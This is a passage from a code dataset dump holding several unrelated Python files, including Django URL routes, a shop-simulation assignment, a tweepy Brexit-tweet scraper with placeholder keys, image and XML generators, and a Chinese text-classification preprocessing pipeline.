path('model/filter/orient/', posts.views.filter_orient, name=\"filter_orient\"),\n path('model/filter/western/', posts.views.filter_western, name=\"filter_western\"),\n path('model/filter/classic/', posts.views.filter_classic, name=\"filter_classic\"),\n path('model/filter/modern/', posts.views.filter_modern, name=\"filter_modern\"),\n\n path('photo/', PhotoPageView.as_view(), name=\"photo\"),\n path('photo/post/', PhotoCreatePostView.as_view(), name=\"photo_post\"),\n path('photo/detail//', posts.views.photo_detail, name=\"photo_detail\"),\n\n path('photo/filter/orient/', posts.views.photo_filter_orient, name=\"photo_filter_orient\"),\n path('photo/filter/western/', posts.views.photo_filter_western, name=\"photo_filter_western\"),\n path('photo/filter/classic/', posts.views.photo_filter_classic, name=\"photo_filter_classic\"),\n path('photo/filter/modern/', posts.views.photo_filter_modern, name=\"photo_filter_modern\"),\n\n path('', posts.views.home, name=\"home\"),\n\n]","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"25408453","text":"from dataclasses import dataclass, field\nfrom typing import List\nimport csv\n\n# Data containers for variable information\n@dataclass \nclass Product:\n name: str\n price: float = 0.0\n\n@dataclass \nclass ProductStock:\n product: Product\n quantity: int\n\n@dataclass \nclass Shop:\n cash: float = 0.0\n stock: List[ProductStock] = field(default_factory=list)\n\n@dataclass\nclass Customer:\n name: str = \"\"\n budget: float = 0.0\n shopping_list: List[ProductStock] = field(default_factory=list)\n\n# Stock shop from csv file received\ndef create_and_stock_shop():\n shop = Shop() \n with open(\"../stock.csv\") as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=\",\")\n first_row = next(csv_reader)\n shop.cash = float(first_row[0])\n for row in csv_reader:\n prod = Product(row[0], float(row[1]))\n prod_st = ProductStock(prod, float(row[2]))\n shop.stock.append(prod_st)\n return shop\n\n# Extract data from csv file to create customer shopping list\ndef read_customer(file_path):\n with open(file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=\",\")\n first_row = next(csv_reader)\n cust= Customer(first_row[0], float(first_row[1]))\n for row in csv_reader:\n name = row[0]\n quantity = float(row[1])\n prod = Product(name)\n prod_st = ProductStock(prod, quantity)\n cust.shopping_list.append(prod_st)\n return cust\n\n# Print product name and price\ndef print_product(prod):\n print(f\"\\nPRODUCT NAME: {prod.name} \\nPRODUCT PRICE: €{prod.price:.2f} \\n------------------------\")\n\ndef print_customer(cust, shop):\n check_stock(cust, shop) # Check stock levels are adequate to cover customers order\n calculate_costs(cust, shop) # Determine the cost of the item from the matching name in the shop\n total_order = 0 # Create initial value of variable for total order amount\n print(f\"Customer name is {cust.name} and they have €{cust.budget:.2f} for their budget.\\n\")\n\n # Iterate through items in shopping list to determine price of the total order\n for item in cust.shopping_list: \n print(f\"{cust.name} wants {item.quantity:.0f} of the product {item.product.name}.\")\n cost = item.quantity * item.product.price\n\n # Check item exists in the store\n if (cost == 0):\n print(f\"The product {item.product.name} cannot be found. Please enter a name matching the shop stock shown above.\")\n main()\n\n total_order += cost\n print(f\"The cost to {cust.name} will be €{cost:.2f}.\\n\")\n\n # Check if customer has enough in budget to fulfill the order. Adjust shop cash and stock levels accordingly\n if total_order <= cust.budget:\n shop.cash += total_order\n print(f\"The total price of the order for {cust.name} is €{total_order:.2f}. Transaction complete. {cust.name} now has €{cust.budget-total_order:.2f} remaining in their budget. Shop cash is now €{shop.cash}.\\n\")\n for item in cust.shopping_list: # Iterate through individual items in shopping list\n for prod in shop.stock: # Iterate the item pulled from shopping list through the shop stock \n if item.product.name == prod.product.name: # If names are equal then adjust quantities outlined below\n prod.quantity = prod.quantity - item.quantity # Update shop quantities to reflect purchased goods taken from shop stock\n else:\n print(f\"The total price of the order for {cust.name} is €{total_order:.2f}. {cust.name} has insufficient funds to complete the transaction.\\n\")\n\ndef print_shop(shop):\n print(f\"\\nShop has €{shop.cash} in cash.\")\n\n # Iterate through objects in store to print off\n for item in shop.stock:\n print_product(item.product)\n print(f\"The Shop has {item.quantity:.0f} of the above.\\n\")\n\n# Check shop has adequate stocks to fulfill order\ndef check_stock(cust, shop):\n for item in cust.shopping_list:\n for prod in shop.stock:\n if item.product.name == prod.product.name and item.quantity > prod.quantity:\n print(f\"We do not have enough stock of {item.product.name}, please re-select products to continue with your purchase.\")\n custmenu()\n \n # Calculate each items price from the shop list\ndef calculate_costs(cust, shop):\n for shop_item in shop.stock: # Iterate through individual items in shop stock \n for list_item in cust.shopping_list: # Iterate the item pulled from shop stock list through the customer shopping list \n if (list_item.product.name == shop_item.product.name): # If names are equal then adjust price in the shopping list outlined below\n list_item.product.price = shop_item.product.price # Update shopping list price to match shop price\n\n# Live mode for customer to enter their own orders\ndef live_mode():\n cust_name = input(\"What is your name? \")\n\n # Check for input error by user\n try:\n budget= float(input(f\"And what is your budget today {cust_name}: €\"))\n except ValueError:\n print(\"\\nPlease enter a float value for the budget.\\n\")\n live_mode()\n\n cust= Customer(cust_name, budget)\n print(\"That's great! The available products are listed below with quantities and prices noted.\")\n print_shop(shop)\n shopping_list=[] # Create empty array for input\n additional_items = \"Y\" # Create starting condition to open while loop\n while (additional_items == \"Y\"):\n name = input(\"What would you like to purchase? Please note product description must match exactly: \")\n \n # Check for input error by user\n try:\n quantity = int(input(\"And how many would you like? \"))\n except ValueError:\n print(\"\\nPlease enter an integer value for the quantity. Restarting order process...\\n\")\n live_mode()\n\n prod = Product(name)\n prod_st = ProductStock(prod, quantity)\n cust.shopping_list.append(prod_st)\n additional_items = input(\"Would you like to order additional items? Y/N \\n\")\n\n return cust\n\n# Main menu displayed when shop is run\ndef display_menu():\n print(\"MENU\")\n print(\"====\")\n print(\"1- Choose pre loaded baskets\")\n print(\"2- Live mode\")\n print(\"3- Check shop cash\")\n print(\"4- Check shop cash & stock\")\n print(\"5- Exit\")\n\n# Main menu options\ndef main():\n while True:\n display_menu()\n choice = input(\"Choice: \")\n\n if (choice == \"1\"):\n custmenu()\n\n elif (choice == \"2\"):\n cust= live_mode()\n print_customer(cust, shop)\n\n elif (choice == \"3\"):\n print(f\"\\nThe shop has €{shop.cash:.2f}\\n\")\n \n elif (choice == \"4\"):\n print_shop(shop) \n\n elif (choice == \"5\"):\n exit()\n\n else:\n print(\"This is not a valid selection\\n\")\n\n# Sub menu for displaying customer pre loaded baskets \ndef display_custmenu():\n print(\"1- Standard\")\n print(\"2- Not enough in budget\")\n print(\"3- Quantities selected too great\")\n print(\"4- Back\")\n print(\"5- Exit\")\n\n# Sub menu options\ndef custmenu():\n while True:\n print(\"\\nCustomer test csv files available-\")\n display_custmenu()\n customer_type = input(\"Choice: \")\n if (customer_type == \"1\"):\n cust= read_customer(\"../Standard.csv\")\n print_customer(cust, shop)\n elif (customer_type == \"2\"):\n cust= read_customer(\"../Budget.csv\")\n print_customer(cust, shop)\n elif (customer_type == \"3\"):\n cust= read_customer(\"../Quantity.csv\")\n print_customer(cust, shop)\n elif (customer_type == \"4\"):\n main()\n elif (customer_type == \"5\"):\n exit()\n else:\n print(\"This is not a valid selection. Please re-select.\\n\")\n\nif __name__ == \"__main__\":\n shop = create_and_stock_shop()\n print_shop(shop)\n main()","sub_path":"G00376322 - Ian Wafer - Assignment 1/python/shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":8116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"345584293","text":"import tweepy\nimport csv\nimport pandas as pd\n\n# Enter authentification credentials:\nconsumer_key = 'CONSUMER_KEY'\nconsumer_secret = 'CONSUMER_SECRET'\naccess_token = 'ACCESS_TOKEN'\naccess_token_secret = 'ACCESS_SECRET'\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth,wait_on_rate_limit=True)\n \n# Open CSV file to append new rows with data (based on the query): \nwith open('Brexit_.csv', 'a') as outfile:\n # Searching a selected number of tweets (e.g., 2000) containing the keyword 'Brexit' \n # Restriction on date/period & language\n for tweet in tweepy.Cursor(api.search, q=\"brexit\", \n lang=\"en\",\n since=\"2017-11-20\",\n until=\"2017-11-26\").items(2000):\n csv_write = csv.writer(outfile, delimiter=',', quotechar='\"')\n csv_write.writerow([tweet.id, \n tweet.author.screen_name,\n tweet.author.verified,\n tweet.author.followers_count, \n tweet.created_at, \n tweet.text,\n tweet.in_reply_to_screen_name,\n tweet.in_reply_to_status_id,\n tweet.source,\n tweet.is_quote_status,\n tweet.retweeted,\n tweet.favorite_count,\n tweet.retweet_count,\n tweet.author.location])\n","sub_path":"twitter_scraper_csv.py","file_name":"twitter_scraper_csv.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"91852086","text":"import cv2\nimport math\nimport os\nimport random\nimport numpy as np\n\nfrom PIL import Image, ImageFont, ImageDraw, ImageFilter\n\ndef create_and_save_sample(index, text, font, out_dir, height, extension, skewing_angle, random_skew, blur, random_blur, background_type):\n image_font = ImageFont.truetype(font=os.path.join('fonts', font), size=32)\n text_width, text_height = image_font.getsize(text)\n\n txt_img = Image.new('L', (text_width, text_height), 255)\n\n txt_draw = ImageDraw.Draw(txt_img)\n\n txt_draw.text((0, 0), text, fill=random.randint(1, 80), font=image_font)\n\n random_angle = random.randint(0-skewing_angle, skewing_angle)\n\n rotated_img = txt_img.rotate(skewing_angle if not random_skew else random_angle, expand=1)\n\n new_text_width, new_text_height = rotated_img.size\n\n # We create our background a bit bigger than the text\n background = None\n\n if background_type == 0:\n background = create_gaussian_noise_background(new_text_height + 10, new_text_width + 10)\n elif background_type == 1:\n background = create_plain_white_background(new_text_height + 10, new_text_width + 10)\n else:\n background = create_quasicrystal_background(new_text_height + 10, new_text_width + 10)\n\n mask = rotated_img.point(lambda x: 0 if x == 255 or x == 0 else 255, '1')\n\n background.paste(rotated_img, (5, 5), mask=mask)\n\n # Create the name for our image\n image_name = '{}_{}.{}'.format(text, str(index), extension)\n\n # Resizing the image to desired format\n new_width = float(text_width + 10) * (float(height) / float(text_height + 10))\n image_on_background = background.resize((int(new_width), height), Image.ANTIALIAS)\n\n final_image = image_on_background.filter(\n ImageFilter.GaussianBlur(\n radius=(blur if not random_blur else random.randint(0, blur))\n )\n )\n\n # Save the image\n final_image.convert('RGB').save(os.path.join(out_dir, image_name))\n\ndef create_gaussian_noise_background(height, width):\n \"\"\"\n Create a background with Gaussian noise (to mimic paper)\n \"\"\"\n\n # We create an all white image\n image = np.ones((height, width)) * 255\n\n # We add gaussian noise\n cv2.randn(image, 235, 10)\n\n return Image.fromarray(image).convert('L')\n\ndef create_plain_white_background(height, width):\n \"\"\"\n Create a plain white background\n \"\"\"\n\n return Image.new(\"L\", (width, height), 255)\n\ndef create_quasicrystal_background(height, width):\n \"\"\"\n Create a background with quasicrystal (https://en.wikipedia.org/wiki/Quasicrystal)\n \"\"\"\n\n image = Image.new(\"L\", (width, height))\n pixels = image.load()\n\n frequency = random.random() * 30 + 20 # frequency\n phase = random.random() * 2 * math.pi # phase\n rotation_count = random.randint(10, 20) # of rotations\n\n for kw in range(width):\n y = float(kw) / (width - 1) * 4 * math.pi - 2 * math.pi\n for kh in range(height):\n x = float(kh) / (height - 1) * 4 * math.pi - 2 * math.pi\n z = 0.0\n for i in range(rotation_count):\n r = math.hypot(x, y)\n a = math.atan2(y, x) + i * math.pi * 2.0 / rotation_count\n z += math.cos(r * math.sin(a) * frequency + phase)\n c = int(255 - round(255 * z / rotation_count))\n pixels[kw, kh] = c # grayscale\n return image\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"135438800","text":"#variables\nnameToWrite = \"shapes.xml\"\npanelsWide = 26 #19 #with half panels #28 #23\npanelsHigh = 6\n #in pixels, must be recaclulated per resolution\npanelSize = 125 #95 #130\npanelTex = 125\npanelGap = 7 #7\npanelSplit = 21 #panelGap *7\npanelSplitSmall = 15\npanelOffset = 0\n\n#shorthand xml tags\nrS = \"\\n\"\nrE = \"\\n\"\nsS = \"\\t\\n\\t\\tquad\\n\"\nsE = \"\\t\\n\"\nvS = \"\\t\\t\\n\"\nvE = \"\\t\\t\\n\"\npS = \"\\t\\t\\n\"\npE = \"\\t\\t\\n\"\ndS = \"\\t\\t\\t\\n\"\n\n#init and add preamble\nidCounter = 0\ntoWrite = rS\n\n#loop over quads \nfor i in range( panelsHigh ):\n for j in range( panelsWide ) :\n toWrite += sS + str(idCounter) + sM + vS\n #projection verts\n if i < 2:\n toWrite += dS + str(j*panelSize + j*panelGap) +dM+ str(i*panelSize + i*panelGap) + dE\n toWrite += dS + str(j*panelSize + panelSize + j*panelGap) +dM+ str(i*panelSize + i*panelGap) + dE\n toWrite += dS + str(j*panelSize + panelSize + j*panelGap) +dM+ str(i*panelSize + panelSize + i*panelGap) + dE\n toWrite += dS + str(j*panelSize + j*panelGap) +dM+ str(i*panelSize + panelSize + i*panelGap) + dE\n elif i < 5:\n toWrite += dS + str(j*panelSize + j*panelGap) +dM+ str(i*panelSize + i*panelGap + panelSplit) + dE\n toWrite += dS + str(j*panelSize + panelSize + j*panelGap) +dM+ str(i*panelSize + i*panelGap + panelSplit) + dE\n toWrite += dS + str(j*panelSize + panelSize + j*panelGap) +dM+ str(i*panelSize + panelSize + i*panelGap + panelSplit) + dE\n toWrite += dS + str(j*panelSize + j*panelGap) +dM+ str(i*panelSize + panelSize + i*panelGap + panelSplit) + dE\n else:\n toWrite += dS + str(j*panelSize + j*panelGap) +dM+ str(i*panelSize + i*panelGap + panelSplit + panelSplitSmall) + dE\n toWrite += dS + str(j*panelSize + panelSize + j*panelGap) +dM+ str(i*panelSize + i*panelGap + panelSplit + panelSplitSmall) + dE\n toWrite += dS + str(j*panelSize + panelSize + j*panelGap) +dM+ str(i*panelSize + panelSize + i*panelGap + panelSplit + panelSplitSmall) + dE\n toWrite += dS + str(j*panelSize + j*panelGap) +dM+ str(i*panelSize + panelSize + i*panelGap + panelSplit + panelSplitSmall) + dE\n\n toWrite += vE + pS\n #texture verts\n toWrite += dS + str(j*panelTex) + dM + str(i*panelTex) + dE\n toWrite += dS + str(j*panelTex + panelTex) + dM + str(i*panelTex) + dE\n toWrite += dS + str(j*panelTex + panelTex) + dM + str(i*panelTex + panelTex) + dE\n toWrite += dS + str(j*panelTex) + dM + str(i*panelTex + panelTex) + dE\n\n toWrite += pE + sE\n idCounter += 1\n\n#add post everything\ntoWrite += rE\n\nfileOut = open( nameToWrite, \"w\" )\nfileOut.write( toWrite )\nfileOut.close()","sub_path":"machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"418613480","text":"import numpy as np\r\nimport pandas as pd\r\nimport os\r\nfile_dir = os.path.dirname(\"D:/LTK_AI/LTK_AI_Study/AI_Study/Data/\")\r\nsave_dir = os.path.dirname(\"D:/LTK_AI/LTK_AI_Study/AI_Study/Data/Numpy/\")\r\n\r\ndef name_class(y):\r\n return_list = []\r\n for i in range(len(y)):\r\n if y[i] == \"Iris-setosa\":\r\n return_list.append(0)\r\n elif y[i] == \"Iris-versicolor\":\r\n return_list.append(1)\r\n elif y[i] == \"Iris-virginica\":\r\n return_list.append(2)\r\n return return_list\r\n\r\niris_data = pd.read_csv(file_dir+\"/iris2.csv\", encoding=\"utf-8\")\r\n\r\n\r\nx = np.array(iris_data.iloc[:,:-1])\r\ny = name_class(iris_data.iloc[:,-1])\r\nprint(y)\r\n\r\ny = np.array(y,dtype=np.int32)\r\niris2_data = np.c_[x,y]\r\nnp.save(save_dir+\"/iris2_data.npy\",iris2_data)\r\n\r\niris2_data = np.load(save_dir+\"/iris2_data.npy\")","sub_path":"Day0821/T04_Iris_Numpy.py","file_name":"T04_Iris_Numpy.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636982310","text":"import pandas as pd\nimport numpy as np\nimport jieba\nfrom gensim.models import word2vec\nfrom gensim import corpora\nimport os\nimport re\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\n\nclass TrainDataPrecondition(object):\n def __init__(self):\n self.seg_list = []\n self.stopWords = set()\n self.trainData = None\n self.carveData = []\n self.model = None\n self.wv = None\n self.corpus = None\n self.w2vDim = 100\n self.EmbeddingMatrix = []\n self.classNum = None\n self.vocbSize = None\n self.maxWordNum = 0\n self.testData = None\n \n\n def getTrainData(self, path='./data_LC/', name=\"train.tsv\"):\n print(\"Reading TrainData\")\n trainData = pd.read_table(path + name,\n encoding=\"gb18030\",\n quoting=3\n )\n self.trainData = trainData\n trainType = trainData['TYPE']\n return trainData['ITEM_NAME']\n \n def getTestData(self, path='./data_LC/', name=\"test.tsv\"):\n print(\"Reading TestData\")\n testData = pd.read_table(path + name,\n encoding=\"gb18030\",\n quoting=3\n )\n self.testData = testData\n return testData\n \n def _stopwordslist(self, stopwordpath):\n print(\"insert stopwords\")\n stopwords = [line.strip() for line in open(stopwordpath, 'r', encoding='gb18030').readlines()]\n self.stopWords = set(stopwords)\n\n def _suggestFreq(self):\n freq = ['腾讯QQ', 'q币', 'qq币', 'Q币', 'QQ币', 'QB', 'qb', 'DVD','黄钻','红钻','黑钻','绿钻','狗粮','成犬'\n ,'狗盆','猫碗','狗碗','泡茶','煮水','煮茶','蓝钻','紫钻']\n for word in freq:\n jieba.suggest_freq(word, True)\n\n def outletCarveData(self, path, name, num):\n if not os.path.exists(path):\n os.mkdir(path)\n saveData = pd.DataFrame(self.seg_list)\n saveData.to_csv(path + str(num) + name,\n encoding=\"gb18030\",\n header=False,\n index=False)\n del saveData\n del self.seg_list\n self.seg_list = []\n #将pandas数据存成文件\n\n def outletItemCarve(self,\n stopWordPath=\"./data_preprocess/chineseStopWords.txt\",\n loop=0,\n carveDataPath=\"./data_preprocess/carve/\",\n carveDataName=\"carve.tsv\",\n outlet=True,\n batch=False):\n self._stopwordslist(stopWordPath)\n self._suggestFreq()\n num = 1\n items = tqdm(pd.DataFrame(self.trainData, columns=['ITEM_NAME'])['ITEM_NAME'])\n if loop == 0:\n loop = len(items)\n for item in items:\n seg = jieba.lcut(self.clean_numbers(item), cut_all=False)\n\n newSeg = []\n while (len(seg)):\n #print(len(seg))\n word = seg.pop(0)\n if word != '' and word != ' ':\n if word not in self.stopWords:\n if word != '\\t' and word != '\\r\\n':\n newSeg.append(word)\n self.seg_list.append(newSeg)\n\n del newSeg\n\n if num >= loop:\n self.outletCarveData(carveDataPath, carveDataName, num)\n return None\n\n if batch:\n if num % 10000 == 0 and outlet:\n self.outletCarveData(carveDataPath, carveDataName, num)\n\n num += 1\n\n\n def getCarveData(self, path=\"./data_preprocess/carve/\", addNone=False):\n print(\"getCarveData\")\n for dirpath, dirnames, filenames in os.walk(path):\n for filepath in filenames:\n getCarveData = pd.read_csv(dirpath+filepath,\n encoding=\"gb18030\",\n header=None,\n low_memory=False\n )\n getCarveData = getCarveData.values\n #print(\"getData:\", getCarveData[0])\n\n for words in getCarveData:\n tempWords = []\n for word in words:\n if word != None:\n if isinstance(word, str):\n tempWords.append(word)\n elif addNone:\n tempWords.append('')\n self.carveData.append(tempWords)\n #print(len(tempWords))\n #print(tempWords)\n if len(tempWords) > self.maxWordNum:\n self.maxWordNum = len(tempWords)\n #print(self.maxWordNum)\n del tempWords\n #print(\"carveData:\", self.carveData[0])\n del getCarveData\n return self.carveData\n\n def outletTypeData(self, path=\"./data_preprocess/type/\", name=\"type.tsv\"):\n if not os.path.exists(path):\n os.mkdir(path)\n typeData = pd.DataFrame(self.trainData, columns=['TYPE'])\n # 将pandas数据存成文件\n typeData.to_csv(path + name,\n encoding=\"gb18030\",\n header=False,\n index=False)\n\n def getTypeData(self, path=\"./data_preprocess/type/\", name=\"type.tsv\"):\n print(\"getTypeData\")\n typeData = pd.read_csv(path + name,\n encoding=\"gb18030\",\n header=None)\n typeData = typeData.values\n\n typeList = [type[0] for type in typeData]\n typeSet = set(typeList)\n\n type2typeidx = {types: idx for idx, types in enumerate(typeSet)}\n typeidx2type = {idx: types for (types, idx) in type2typeidx.items()}\n #idx2typeidx = {idx: type2typeidx[types] for idx, types in enumerate(typeList)}\n typeidxList = [type2typeidx[types] for types in typeList]\n self.classNum = len(typeidxList)\n with open('./data_preprocess/type.txt','w+') as f:\n for idx, tp in typeidx2type.items():\n f.write(str(idx)+ \" \"+ tp + \"\\n\")\n return typeidx2type, typeidxList\n\n def w2vTraining(self, loop=5, path=\"./data_preprocess/model/\", name=\"model.model\"):\n flag = True\n times = 0\n while times < loop:\n times += 1\n if flag:\n flag = False\n if os.path.exists(path + name):\n self.getModel(path, name)\n else:\n print(\"w2vTraining\")\n #print(\"training NSmodelCBOW\")\n print(\"创建模型存于%s%s\" % (path, name))\n print(\"训练模型第%d次\" % times)\n self.model = word2vec.Word2Vec(self.carveData, workers=4,\n hs=0, min_count=3,\n window=6, size=self.w2vDim,\n sg=0, iter=1)\n # print(\"training NSmodelSG\")\n # NSmodelSG = word2vec.Word2Vec(self.carveData, hs=0, min_count=2, window=6, size=100, sg=1, iter=8)\n # print(\"training HSmodelCBOW\")\n # HSmodelCBOW = word2vec.Word2Vec(self.carveData, hs=1, min_count=2, window=6, size=100, sg=0, iter=10)\n # print(\"training HSmodelSG\")\n # HSmodelSG = word2vec.Word2Vec(self.carveData, hs=1, min_count=2, window=6, size=100, sg=1, iter=8)\n self._saveModel(self.model, path, name)\n continue\n print(\"训练模型第%d次\" % times)\n self.model.build_vocab(self.carveData, update=True)\n self.model.train(self.carveData,\n total_examples=self.model.corpus_count,\n epochs=1)\n self._saveModel(self.model, path, name)\n\n\n def trainingTest(self, model=None):\n if model is None:\n model = self.model\n def nearestWord(searchWord, count=5):\n req_count = count\n for key in model.wv.similar_by_word(searchWord, topn=100):\n if len(key[0]) == 3:\n req_count -= 1\n print(key[0], key[1])\n if req_count == 0:\n break\n\n def wordSimilaity(string1, string2):\n #cbow,\n ns_cbow = model.wv.similarity(string1, string2)\n #self.savemodel(ns_cbow, \"./data_preprocess/model/ns_cbow.model\")\n\n #ns_sg = NSmodelSG.wv.similarity(string1, string2)\n #self.savemodel(ns_sg, \"./data_preprocess/model/ns_sg.model\")\n\n #hs_cbow = HSmodelCBOW.wv.similarity(string1, string2)\n #self.savemodel(hs_cbow, \"./data_preprocess/model/hs_cbow.model\")\n\n #hs_sg = HSmodelSG.wv.similarity(string1, string2)\n #self.savemodel(hs_sg, \"./data_preprocess/model/hs_sg.model\")\n\n print(\"ns_cbow:\", ns_cbow)\n #print(\"ns_sg:\", ns_sg)\n #print(\"hs_cbow:\", hs_cbow)\n #print(\"hs_sg:\", hs_sg)\n\n searchWord = '爱普生'\n print('NSmodelCBOW')\n nearestWord(searchWord)\n #print('\\nNSmodelSG')\n #nearestWord(NSmodelSG, searchWord)\n #print('\\nHSmodelCBOW')\n #nearestWord(HSmodelCBOW, searchWord)\n #print('\\nHSmodelSG')\n #nearestWord(HSmodelSG, searchWord)\n\n wordSimilaity(\"爱普生\", \"EPSON\")\n\n def _saveModel(self, model, path=\"./data_preprocess/model/\", name=\"model.model\"):\n if not os.path.exists(path):\n os.mkdir(path)\n model.save(path+name)\n\n def getModel(self, path=\"./data_preprocess/model/\", name=\"model.model\"):\n if os.path.exists(path+name):\n self.model = word2vec.Word2Vec.load(path+name)\n\n #弃用\n def getCorpora(self):\n print(\"getCorpora\")\n dictionary = corpora.Dictionary(self.carveData)\n corpus_idx = [dictionary.doc2idx(text) for text in self.carveData]\n corpus_bow = [dictionary.doc2bow(text) for text in self.carveData]\n\n return corpus_idx\n\n def saveModelAsWordVector(self, path=\"./data_preprocess/wordVec/\", name=\"wordVec.wv\"):\n #模型训练好以后可以转成WordVector模式,体积小速度快\n print(\"saveModelAsWordVector\")\n if not os.path.exists(path):\n os.mkdir(path)\n self.model.wv.save(path + name)\n\n def getWordVector(self, path=\"./data_preprocess/wordVec/\", name=\"wordVec.wv\"):\n if os.path.exists(path+name):\n self.wv = KeyedVectors.load(path+name, mmap='r') # 内存映射\n return self.wv\n\n def getVecList(self):\n #使用wordVector,需要先将model转成wv\n print(\"getVecList\")\n vecList = []\n for words in self.carveData:\n tempList = []\n for word in words:\n try:\n tempList.append(self.wv[word])\n except KeyError:\n pass#训练时被排除的少用词\n vecList.append(tempList)\n del tempList\n return vecList\n\n def getDictionary(self, carveData=None):\n if carveData == None:\n carveData = self.carveData\n wordSet = set([word for words in carveData for word in words])\n word2wordidx = {word: idx for idx, word in enumerate(wordSet)}\n wordidx2word = {idx: word for (word, idx) in word2wordidx.items()}\n return word2wordidx, wordidx2word\n\n def getCorpus(self, word2wordidx,\n addNone=False, matrix=False,\n carveData=None, wv=None,\n maxWordNum=None):\n\n if carveData==None:\n carveData = self.carveData\n if wv == None:\n wv = self.wv\n\n if matrix:\n\n if maxWordNum == None:\n maxWordNum = self.maxWordNum\n\n self.corpus = np.zeros([len(carveData), maxWordNum])\n i = 0\n for words in carveData:\n j = 0\n for word in words:\n if word in self.wv:\n self.corpus[i][j] = word2wordidx[word]\n elif addNone:\n self.corpus[i][j] = word2wordidx['']\n j += 1\n for last in range(j, maxWordNum):\n self.corpus[i][last] = word2wordidx['']\n i += 1\n\n else:\n self.corpus = []\n for words in self.carveData:\n tempList = []\n for word in words:\n if word in self.wv:\n tempList.append(word2wordidx[word])\n self.corpus.append(tempList)\n del tempList\n\n return self.corpus\n\n\n def getEmbeddingMatrix(self, wordidx2word):\n self.vocbSize = len(wordidx2word)\n for index in range(self.vocbSize):\n if wordidx2word[index] in self.wv:\n self.EmbeddingMatrix.append(self.wv[wordidx2word[index]])\n else:\n self.EmbeddingMatrix.append([0.0 for i in range(self.w2vDim)])\n\n return np.array(self.EmbeddingMatrix)\n \n def get_fasttextData(self,data = None, labels = None, path = \"./data_fasttext/\", name = 'train.txt'):\n d_list = []\n data = tqdm(data)\n for i, item in enumerate(data):\n outline = \" \".join(item) + \"\\t__label__\" + str(labels[i])\n d_list.append(outline)\n df = pd.DataFrame(d_list)\n df.to_csv(path + name,index=False, encoding = 'gb18030', header = None)\n \n def clean_numbers(self,s):\n #s = re.sub(r'[0-9]*[a-zA-Z]*[0-9]+[a-zA-Z]*',\" \",s)\n s = re.sub(r'[0-9]+.[0-9]+',\" \",s)\n s = re.sub(r'[0-9]+', \" \", s)\n pattern = re.compile(r'[a-z]+', re.I)\n s = re.sub(pattern, lambda m: m.group(0) + \" \",s)\n #s = re.sub('[a-z]{1,1}',\"\", s)\n return s\n\nif __name__ == \"__main__\":\n TDP = TrainDataPrecondition()\n TDP.getTrainData()\n X_train = TDP.getCarveData()\n\n #X_test = TDP.getTestData()\n #TDP.outletItemCarve(loop=0)\n #TDP.outletTypeData()\n type_dict, type_list = TDP.getTypeData()\n #carveData = TDP.getCarveData(\"./data_preprocess/carve/\", addNone=True)\n y_train = type_list\n X_tra, X_val, y_tra, y_val = train_test_split(X_train, y_train, train_size=0.8, random_state=233)\n TDP.get_fasttextData(X_tra, y_tra, name = 'train.txt')\n TDP.get_fasttextData(X_val, y_val, name = 'test.txt')\n #如果没训练就需要getModel,训练了就不需要了,可以调用trainingTest测试模型效果\n #可以增量训练\n #TDP.w2vTraining(loop=1, path=\"./data_preprocess/model/\", name=\"NSmodelCBOW_mc3w6.model\")\n #TDP.getModel(path=\"./data_preprocess/model/\", name=\"NSmodelCBOW_mc3w6.model\")\n #TDP.trainingTest()\n\n # 模型训练好以后可以转成WordVector模式,体积小速度快,转换也需要getWordVector()\n #TDP.saveModelAsWordVector(path=\"./data_preprocess/wordVec/\", name=\"wordVec.wv\")\n #wv = TDP.getWordVector(path=\"./data_preprocess/wordVec/\", name=\"wordVec.wv\")\n #将分词用词向量代替\n #vecList = TDP.getVecList()\n\n #w2i, i2w = TDP.getDictionary()\n #corpus = TDP.getCorpus(w2i, matrix=True)\n #EmbeddingMatrix = TDP.getEmbeddingMatrix(i2w)\n","sub_path":"www/classifier/trainDataProcess.py","file_name":"trainDataProcess.py","file_ext":"py","file_size_in_byte":15628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"631808681","text":"# -*- coding: utf-8 -*-\nimport sys\nimport random\nimport traceback\nimport math\n\nstep_to_goal = 30\ndice_num = 10\n\ndef show_rule():\n print(\"{0}マス先にゴールがあります\".format(step_to_goal))\n print(\"{0}個のサイコロを好きな数だけ振って駒を進めます\".format(dice_num))\n print(\"ゴールにぴったり止まれば上がりです。目の数が多ければ、余った目の数だけ���ります。\")\n\ndef run():\n counter = 1\n rest_step = step_to_goal\n while rest_step != 0:\n print(\"{0}回目\".format(counter))\n print(\"残り{0}マス\".format(rest_step))\n num = get_input()\n step = sum([random.randint(1, 6) for _ in xrange(num)])\n print(\"出目の合計:{0}\".format(step))\n rest_step -= step\n rest_step = int(math.fabs(rest_step)) if rest_step < 0 else rest_step\n counter += 1\n print(\"{0}回目で上がりです\".format(counter - 1))\n\ndef get_input():\n print(\"サイコロの数\")\n while True:\n num = raw_input('>')\n if num.isdigit() and (1 <= int(num) <= dice_num):\n return int(num)\n\nif __name__ == '__main__':\n try:\n show_rule()\n run()\n except Exception as e:\n print(traceback.format_exc())\n finally:\n sys.exit(0)\n","sub_path":"01_various/047_sugoroku/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"515921479","text":"# -*- coding: utf-8 